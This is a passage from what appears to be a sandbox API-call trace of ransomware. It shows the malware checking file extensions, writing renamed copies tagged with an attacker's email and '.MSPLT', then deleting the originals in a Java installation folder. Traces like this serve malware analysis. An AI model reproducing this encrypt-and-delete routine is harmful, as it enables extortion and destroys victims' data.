(lpString=".xls") returned 4 [0307.963] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.963] lstrlenW (lpString=".xlsx") returned 5 [0307.963] lstrcmpiW (lpString1=".xlsx", lpString2="r.ttf") returned -1 [0307.963] lstrlenW (lpString=".ppt") returned 4 [0307.963] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.963] lstrlenW (lpString=".zip") returned 4 [0307.963] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.963] lstrlenW (lpString=".rar") returned 4 [0307.963] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.963] lstrlenW (lpString=".bz2") returned 4 [0307.963] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.963] lstrlenW (lpString=".7z") returned 3 [0307.964] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.964] lstrlenW (lpString=".dbf") returned 4 [0307.964] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.964] lstrlenW (lpString=".1cd") returned 4 [0307.964] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.964] lstrlenW (lpString=".jpg") returned 4 [0307.964] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.964] lstrlenW (lpString=".doc") returned 4 [0307.964] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString=".docx") returned 5 [0307.964] lstrcmpiW (lpString1=".docx", lpString2="r.ttf") returned -1 [0307.964] lstrlenW (lpString=".pdf") returned 4 [0307.964] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString=".xls") returned 4 [0307.964] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0307.964] lstrlenW (lpString=".xlsx") returned 5 [0307.964] lstrcmpiW (lpString1=".xlsx", lpString2="r.ttf") returned -1 [0307.964] lstrlenW (lpString=".ppt") returned 4 [0307.964] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.964] lstrlenW (lpString=".zip") returned 4 [0307.964] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0307.964] lstrlenW (lpString=".rar") returned 4 [0307.964] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0307.964] lstrlenW (lpString=".bz2") returned 4 [0307.964] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0307.965] lstrlenW (lpString=".7z") returned 3 [0307.965] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0307.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.965] lstrlenW (lpString=".dbf") returned 4 [0307.965] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0307.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.965] lstrlenW (lpString=".1cd") returned 4 [0307.965] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0307.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightRegular.ttf") returned 68 [0307.965] lstrlenW (lpString=".jpg") returned 4 [0307.965] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0307.965] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0307.965] lstrlenW (lpString="LucidaTypewriterBold.ttf") returned 24 [0307.965] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.004] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=234068) returned 1 [0308.004] CloseHandle (hObject=0x524) returned 1 [0308.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf")) returned 0x20 [0308.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.004] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.005] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.005] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.005] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0308.005] GetLastError () returned 0x0 [0308.005] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x39254, lpOverlapped=0x0) returned 1 [0308.086] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x39260, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x39260, lpOverlapped=0x0) returned 1 [0308.091] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.092] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x104, lpOverlapped=0x0) returned 1 [0308.092] SetEndOfFile (hFile=0x420) returned 1 [0308.092] CloseHandle (hObject=0x420) returned 1 [0308.099] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.099] SetEndOfFile (hFile=0x524) returned 1 [0308.108] CloseHandle (hObject=0x524) returned 1 [0308.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0308.109] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf")) returned 1 [0308.110] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.110] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.110] lstrlenW (lpString=".doc") returned 4 [0308.110] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0308.110] lstrlenW (lpString=".docx") returned 5 [0308.110] lstrcmpiW (lpString1=".docx", lpString2="d.ttf") returned -1 [0308.110] lstrlenW (lpString=".pdf") returned 4 [0308.110] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString=".xls") returned 4 [0308.111] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0308.111] lstrlenW (lpString=".xlsx") returned 5 [0308.111] lstrcmpiW (lpString1=".xlsx", lpString2="d.ttf") returned -1 [0308.111] lstrlenW (lpString=".ppt") returned 4 [0308.111] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.111] lstrlenW (lpString=".zip") returned 4 [0308.111] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0308.111] lstrlenW (lpString=".rar") returned 4 [0308.111] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString=".bz2") returned 4 [0308.111] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString=".7z") returned 3 [0308.111] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0308.111] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.111] lstrlenW (lpString=".dbf") returned 4 [0308.111] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.111] lstrlenW (lpString=".1cd") returned 4 [0308.111] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.111] lstrlenW (lpString=".jpg") returned 4 [0308.111] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0308.111] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.112] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.112] lstrlenW (lpString=".doc") returned 4 [0308.112] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0308.112] lstrlenW (lpString=".docx") returned 5 [0308.112] lstrcmpiW (lpString1=".docx", lpString2="d.ttf") returned -1 [0308.112] lstrlenW (lpString=".pdf") returned 4 [0308.112] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0308.112] lstrlenW (lpString=".xls") returned 4 [0308.112] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0308.112] lstrlenW (lpString=".xlsx") returned 5 [0308.112] lstrcmpiW (lpString1=".xlsx", lpString2="d.ttf") returned -1 [0308.112] lstrlenW (lpString=".ppt") returned 4 [0308.112] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0308.112] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.112] lstrlenW (lpString=".zip") returned 4 [0308.112] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0308.112] lstrlenW (lpString=".rar") returned 4 [0308.112] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0308.112] lstrlenW (lpString=".bz2") returned 4 [0308.112] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0308.112] lstrlenW (lpString=".7z") returned 3 [0308.112] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0308.112] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.112] lstrlenW (lpString=".dbf") returned 4 [0308.112] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0308.112] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.112] lstrlenW (lpString=".1cd") returned 4 [0308.113] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0308.113] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 69 [0308.113] lstrlenW (lpString=".jpg") returned 4 [0308.113] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0308.113] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0308.113] lstrlenW (lpString="hijrah-config-umalqura.properties") returned 33 [0308.113] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.114] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=13962) returned 1 [0308.114] CloseHandle (hObject=0x524) returned 1 [0308.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties")) returned 0x20 [0308.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.115] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.115] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.115] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.116] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0308.116] GetLastError () returned 0x0 [0308.116] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x368a, lpOverlapped=0x0) returned 1 [0308.359] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x3690, lpOverlapped=0x0) returned 1 [0308.416] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.416] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x116, lpOverlapped=0x0) returned 1 [0308.416] SetEndOfFile (hFile=0x420) returned 1 [0308.416] CloseHandle (hObject=0x420) returned 1 [0308.424] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.424] SetEndOfFile (hFile=0x524) returned 1 [0308.431] CloseHandle (hObject=0x524) returned 1 [0308.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0308.432] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties")) returned 1 [0308.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.433] lstrlenW (lpString=".doc") returned 4 [0308.433] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0308.433] lstrlenW (lpString=".docx") returned 5 [0308.433] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0308.433] lstrlenW (lpString=".pdf") returned 4 [0308.433] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0308.433] lstrlenW (lpString=".xls") returned 4 [0308.433] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0308.433] lstrlenW (lpString=".xlsx") returned 5 [0308.433] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0308.434] lstrlenW (lpString=".ppt") returned 4 [0308.434] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0308.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.434] lstrlenW (lpString=".zip") returned 4 [0308.434] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0308.434] lstrlenW (lpString=".rar") returned 4 [0308.434] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0308.434] lstrlenW (lpString=".bz2") returned 4 [0308.434] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0308.434] lstrlenW (lpString=".7z") returned 3 [0308.434] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0308.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.434] lstrlenW (lpString=".dbf") returned 4 [0308.434] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0308.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.434] lstrlenW (lpString=".1cd") returned 4 [0308.434] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0308.435] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.435] lstrlenW (lpString=".jpg") returned 4 [0308.435] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0308.435] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.435] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.435] lstrlenW (lpString=".doc") returned 4 [0308.435] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0308.435] lstrlenW (lpString=".docx") returned 5 [0308.435] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0308.435] lstrlenW (lpString=".pdf") returned 4 [0308.435] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0308.435] lstrlenW (lpString=".xls") returned 4 [0308.435] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0308.435] lstrlenW (lpString=".xlsx") returned 5 [0308.435] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0308.435] lstrlenW (lpString=".ppt") returned 4 [0308.435] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0308.436] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.436] lstrlenW (lpString=".zip") returned 4 [0308.436] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0308.436] lstrlenW (lpString=".rar") returned 4 [0308.436] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0308.436] lstrlenW (lpString=".bz2") returned 4 [0308.436] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0308.436] lstrlenW (lpString=".7z") returned 3 [0308.436] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0308.436] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.436] lstrlenW (lpString=".dbf") returned 4 [0308.436] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0308.436] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.436] lstrlenW (lpString=".1cd") returned 4 [0308.436] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0308.436] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 72 [0308.436] lstrlenW (lpString=".jpg") returned 4 [0308.436] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0308.436] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0308.437] lstrlenW (lpString="cursors.properties") returned 18 [0308.437] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.441] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=1280) returned 1 [0308.441] CloseHandle (hObject=0x524) returned 1 [0308.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties")) returned 0x20 [0308.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.441] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.442] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.442] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.442] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0308.627] GetLastError () returned 0x0 [0308.627] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x500, lpOverlapped=0x0) returned 1 [0308.670] WriteFile (in: hFile=0x540, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x510, lpOverlapped=0x0) returned 1 [0308.671] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.671] WriteFile (in: hFile=0x540, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xf8, lpOverlapped=0x0) returned 1 [0308.671] SetEndOfFile (hFile=0x540) returned 1 [0308.672] CloseHandle (hObject=0x540) returned 1 [0308.676] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.676] SetEndOfFile (hFile=0x524) returned 1 [0308.681] CloseHandle (hObject=0x524) returned 1 [0308.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0308.682] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties")) returned 1 [0308.683] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.683] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.683] lstrlenW (lpString=".doc") returned 4 [0308.683] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString=".docx") returned 5 [0308.683] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0308.683] lstrlenW (lpString=".pdf") returned 4 [0308.683] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString=".xls") returned 4 [0308.683] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString=".xlsx") returned 5 [0308.683] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0308.683] lstrlenW (lpString=".ppt") returned 4 [0308.683] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.683] lstrlenW (lpString=".zip") returned 4 [0308.683] 